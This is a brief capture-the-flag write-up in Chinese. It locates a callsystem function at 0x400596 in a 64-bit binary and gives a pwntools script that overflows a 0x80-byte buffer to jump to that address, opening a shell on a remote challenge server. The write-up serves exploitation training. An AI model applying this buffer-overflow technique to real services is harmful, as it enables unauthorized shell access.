checksec然后试运行
放入64位IDA,F5大法
发现callsystem函数
找到callsystem的地址,是0x400596
写脚本
#coding=utf8
from pwn import *
context.log_level = 'debug'
p = remote('111.198.29.45',48379)
payload = ''
payload += 0x80*'A'
payload += p64(0)
payload += p64(0x400596)
p.sendline(payload)
p.interactive()